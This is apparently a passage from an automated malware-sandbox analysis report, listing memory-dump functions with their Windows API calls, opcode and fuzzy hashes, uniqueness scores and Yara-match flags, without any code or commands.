                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f6b56a8bde674e0765e16cc015421d5c8b570d467e4dcfa851347ee7bf922169
                                                                                        • Instruction ID: cebf8605423069f7ebb7813aa88976d0dc908b40ef7174244fd457854b1a7199
                                                                                        • Opcode Fuzzy Hash: f6b56a8bde674e0765e16cc015421d5c8b570d467e4dcfa851347ee7bf922169
                                                                                        • Instruction Fuzzy Hash: B59002A1243042527545B55B4405527404AA7E06C5791C012A5405950C9566E856E661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e7701de7518775be3d26dc86c644e1273dae76f55618f2c24fb08d932395f0fe
                                                                                        • Instruction ID: 75d73bd7d54158b52a0acb39d65c77b18f4057f3a424130d883ccc44208bab31
                                                                                        • Opcode Fuzzy Hash: e7701de7518775be3d26dc86c644e1273dae76f55618f2c24fb08d932395f0fe
                                                                                        • Instruction Fuzzy Hash: FE9002A5212001032105A95B0705527008A97D57D5351C021F5006550CE661D8616161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 26b324d96696c35a8da03ab9c1751ca5a23e5a291f13aa64ceeaa7974df82564
                                                                                        • Instruction ID: 34913c900e73c877de100783b2ccf00ade3b09cad80a514aaaa90a5f24e82e46
                                                                                        • Opcode Fuzzy Hash: 26b324d96696c35a8da03ab9c1751ca5a23e5a291f13aa64ceeaa7974df82564
                                                                                        • Instruction Fuzzy Hash: 1C9002F120200502F140755B4405766004997D0785F51C011A9055554E9699DDD576A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 9ab58cfbc7fa0284e32cd60b757af413ebce928c49ca8e0cf8d43511fca9e598
                                                                                        • Instruction ID: 7c16ef0ca69cfa12fcd7b39b54403129c003ccfb3c76852d471b5deb3ef538d6
                                                                                        • Opcode Fuzzy Hash: 9ab58cfbc7fa0284e32cd60b757af413ebce928c49ca8e0cf8d43511fca9e598
                                                                                        • Instruction Fuzzy Hash: B49002E1203001036105755B4415636404E97E0685B51C021E5005590DD565D8917165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 277e45add2124a904f2e76263dea1625bd23674e97173864a120c956c350dd89
                                                                                        • Instruction ID: be6bb6f854353e570019d2ea44559c4698a0b5c2fac1c4373bdb1c7a232ec42f
                                                                                        • Opcode Fuzzy Hash: 277e45add2124a904f2e76263dea1625bd23674e97173864a120c956c350dd89
                                                                                        • Instruction Fuzzy Hash: ED9002E134200542F100655B4415B260049D7E1785F51C015E5055554D9659DC527166
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 70ecbce237b596f5a93e7cc27c02af4504c0e02ab501d9f0e9211547abaf673f
                                                                                        • Instruction ID: a611e9e84c293151088fa8e58e4e3fed00026a04394e91fee16f7a567dc630dd
                                                                                        • Opcode Fuzzy Hash: 70ecbce237b596f5a93e7cc27c02af4504c0e02ab501d9f0e9211547abaf673f
                                                                                        • Instruction Fuzzy Hash: 739002B120200902F180755B440566A004997D1785F91C015A4016654DDA55DA5977E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 863b69ea93ef6664a953915f32b080e52b17bdcc036f7e0282f76b2584b49e93
                                                                                        • Instruction ID: 06751a48e5b23d91e11d5f468e1f87ae4458eb1c3177b47188ebfbb74f783ae2
                                                                                        • Opcode Fuzzy Hash: 863b69ea93ef6664a953915f32b080e52b17bdcc036f7e0282f76b2584b49e93
                                                                                        • Instruction Fuzzy Hash: B79002B120604942F140755B4405A66005997D0789F51C011A4055694DA665DD55B6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c20cebbc80aca84835b23088e9fa90237d3fa5dff82190873276b42a8ea107a4
                                                                                        • Instruction ID: 1535b7c4091bc079f2b727bf4bb503384566db926c6aadeaee847e1e5cccbaf9
                                                                                        • Opcode Fuzzy Hash: c20cebbc80aca84835b23088e9fa90237d3fa5dff82190873276b42a8ea107a4
                                                                                        • Instruction Fuzzy Hash: C29002A121280142F200696B4C15B27004997D0787F51C115A4145554CD955D8616561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e726b468dab417cff340d4554c0c1a6bedade201d601d5eecbef831a58196cb0
                                                                                        • Instruction ID: bbc56d639f0da826f719a65905c91b6d83be6aa64c00cef8e0e832f66cc78dac
                                                                                        • Opcode Fuzzy Hash: e726b468dab417cff340d4554c0c1a6bedade201d601d5eecbef831a58196cb0
                                                                                        • Instruction Fuzzy Hash: 859002B120208902F110655B840576A004997D0785F55C411A8415658D96D5D8917161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1ac9ce89c6cd70689dfb074395e52425a48bce8b9f8bb674a6cf509b297d0456
                                                                                        • Instruction ID: 081e0eeb440f2086c78099a739f4ed29de556c43c9f863396a315457043347a2
                                                                                        • Opcode Fuzzy Hash: 1ac9ce89c6cd70689dfb074395e52425a48bce8b9f8bb674a6cf509b297d0456
                                                                                        • Instruction Fuzzy Hash: 5A9002B120200942F100655B4405B66004997E0785F51C016A4115654D9655D8517561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: fea212401a796d9123ac5d72b1a67924e59a52009ba00b9607e335f584d0aedb
                                                                                        • Instruction ID: 33b762ef5a484c27fa75cd28d8a454699ff64883ebe92c78f53bf106187de524
                                                                                        • Opcode Fuzzy Hash: fea212401a796d9123ac5d72b1a67924e59a52009ba00b9607e335f584d0aedb
                                                                                        • Instruction Fuzzy Hash: F19002B120200502F100699B5409666004997E0785F51D011A9015555ED6A5D8917171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5eb23cfc7025bbdb9cf6fb28b2012e078f8b44f916db32e7e960a14903eab059
                                                                                        • Instruction ID: 6dd485d196570f3f280174cae14d7233f8044390bee117b79c2e190e6b82d795
                                                                                        • Opcode Fuzzy Hash: 5eb23cfc7025bbdb9cf6fb28b2012e078f8b44f916db32e7e960a14903eab059
                                                                                        • Instruction Fuzzy Hash: E19002B131214502F110655B8405726004997D1685F51C411A4815558D96D5D8917162
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 98c42b7f84331798079c149c60a8201c3dce1f2196e0ef09374db636f9d7feda
                                                                                        • Instruction ID: e1bd5c144acee326e7e5412803e62ccd7b4822b75bc51698ded2d1ae579bd62c
                                                                                        • Opcode Fuzzy Hash: 98c42b7f84331798079c149c60a8201c3dce1f2196e0ef09374db636f9d7feda
                                                                                        • Instruction Fuzzy Hash: 4B9002A921300102F180755B540962A004997D1686F91D415A4006558CD955D8696361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C7A0A2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02C74506,?,02C74C7F,02C74C7F,?,02C74506,?,?,?,?,?,00000000,00000000,?), ref: 02C7A05D
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A09D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree
                                                                                        • String ID: .z`
                                                                                        • API String ID: 2488874121-1441809116
                                                                                        • Opcode ID: 740d5d5f1d8cb296e67a2bb0094785448269c409509918700c50d3d34b3d06a7
                                                                                        • Instruction ID: b64db98bbf2f8f13d95e3340f0e17228d6cc3831c4a7b02a391e7b4ad98cbb5a
                                                                                        • Opcode Fuzzy Hash: 740d5d5f1d8cb296e67a2bb0094785448269c409509918700c50d3d34b3d06a7
                                                                                        • Instruction Fuzzy Hash: 29016DB22002056FCB14EF98EC84EEB7769EF88760F018949FC595B242C530E915CBF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C7A063, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A09D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        • Opcode ID: 1c70805c2840b166720d85dc3250eeb4fb55178c28eb77b57554ea09da84f7e2
                                                                                        • Instruction ID: f47b939a2a06091f566120c5816890852f2fcb5d95ec9137d84167df949ce15c
                                                                                        • Opcode Fuzzy Hash: 1c70805c2840b166720d85dc3250eeb4fb55178c28eb77b57554ea09da84f7e2
                                                                                        • Instruction Fuzzy Hash: B6F08CB62042046FDB10DFA4EC85ED77B68EF88710F018599F9986B242C530EA15CBF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C7A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A09D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction ID: 1909b1d89b2207ba3e86fe6b05ad06f0ef2d3c62fcbaef5d8bd9d3be0fb30c3b
                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction Fuzzy Hash: 8CE04FB12002086BD714DF59CC44EA777ADEF88750F018554FD0857251C630F910CAF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C682E9, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C6834A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C6836B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 339f5e5e0b7de9c0fbfb6cbfb58910e818b1e081d783a8b36c02388943da0482
                                                                                        • Instruction ID: 11e58987fa651b7eda5a1cadd1455c7ee448fb12ca9d12dc9799718a7adc7686
                                                                                        • Opcode Fuzzy Hash: 339f5e5e0b7de9c0fbfb6cbfb58910e818b1e081d783a8b36c02388943da0482
                                                                                        • Instruction Fuzzy Hash: F9014C31A802297AE720A6949C45FFF775CAF40B14F140158FF04BA0C0E6942A0657F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C682F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C6834A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C6836B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                                        • Instruction ID: 54543c9b9a9f4d7ed51c4918ef40af4791baa1a0c64249da95ffb1e1c5d257bb
                                                                                        • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                                        • Instruction Fuzzy Hash: 2101F231A802287BE720A6949C46FBE776CAB40B54F044118FF04BA1C0E6946A0A5AF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C7A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02C7A134
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction ID: 1b8cd5914e6d13f5225f41a1c08eb3b6498a89a4c9c1698ab1e071ef91689de2
                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction Fuzzy Hash: 890162B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA4DA7251D630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79FF6, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02C74506,?,02C74C7F,02C74C7F,?,02C74506,?,?,?,?,?,00000000,00000000,?), ref: 02C7A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 8401be894ea1414c1d77b92f8bc9c8fd089ec35caf920d12602ae169a1663f7a
                                                                                        • Instruction ID: bb1bbc75887648fcda2f0fda6717888cca32a9b6383957cb37fafdc7b65d6377
                                                                                        • Opcode Fuzzy Hash: 8401be894ea1414c1d77b92f8bc9c8fd089ec35caf920d12602ae169a1663f7a
                                                                                        • Instruction Fuzzy Hash: 74F06DB2204208AFCB14DF59DC80EA773ADEF88310F018459FD5997242D631EA20CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C7A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02C74506,?,02C74C7F,02C74C7F,?,02C74506,?,?,?,?,?,00000000,00000000,?), ref: 02C7A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction ID: eb1c65d281c079d1e9a4f15d2e0ea55132c45c7f3680acd231e682c804c65893
                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction Fuzzy Hash: B6E046B1200208ABDB14EF99CC80EAB77ADEF88750F118558FE086B241C630F910CBF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C7A1CD, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C6F1A2,02C6F1A2,?,00000000,?,?), ref: 02C7A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: f62f904046c5bea5672e73507ab16f5cd7823b0ea009612af3d5a73ed91c0bce
                                                                                        • Instruction ID: 16eb3ec7ad94b6d54f499d6a02b32ce69f22b96a849f57de792749bc0fc9712e
                                                                                        • Opcode Fuzzy Hash: f62f904046c5bea5672e73507ab16f5cd7823b0ea009612af3d5a73ed91c0bce
                                                                                        • Instruction Fuzzy Hash: 29E0DFB92042542BCB10DF54DC80EE73BA8DF49260F158999FCC927202C434A815CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C7A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C6F1A2,02C6F1A2,?,00000000,?,?), ref: 02C7A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction ID: ad0294385d3add50e6add74ff04ba91d92551ecf994daaeb60cdad07c14128c3
                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction Fuzzy Hash: 05E01AB12002086BDB10DF49CC84EEB37ADEF88650F018154BA0867241C930E8108BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C6F697, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02C68CF4,?), ref: 02C6F6CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: a88ce3a1f4406ce389916a2cc75593bb37e1b4bb150636bba99f455bd7a5a65a
                                                                                        • Instruction ID: 5c29728e16b8a74b54901abfeb6492700f8a14b473b816e006c1a6605826d866
                                                                                        • Opcode Fuzzy Hash: a88ce3a1f4406ce389916a2cc75593bb37e1b4bb150636bba99f455bd7a5a65a
                                                                                        • Instruction Fuzzy Hash: 71E0C271BA03017BE714BEB49C0AF2673D66B44A51F444078F949DB2D7EA20D1008590
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C6F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02C68CF4,?), ref: 02C6F6CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                        • Instruction ID: 35c11f3c74ab5ac6f1627508b396885ed6d068d076ab709115ca5a5ef69afbd1
                                                                                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                        • Instruction Fuzzy Hash: 51D0A7717903043BE610FAA49C07F2772CE5B44B14F494064FA49D73C3D950E1004565
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: def99e55e260eb71c4c5175e3058f01a96591ad071906ae4072f7def8746e585
                                                                                        • Instruction ID: b413862c95e9057216e35b34e6aca71a0a0cfec62c1c9a92cbfaa24559421e7c
                                                                                        • Opcode Fuzzy Hash: def99e55e260eb71c4c5175e3058f01a96591ad071906ae4072f7def8746e585
                                                                                        • Instruction Fuzzy Hash: 9CB02BF1E020C1C5F700DB710A08737390077D0740F12C011D1020240A0338D080F2B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

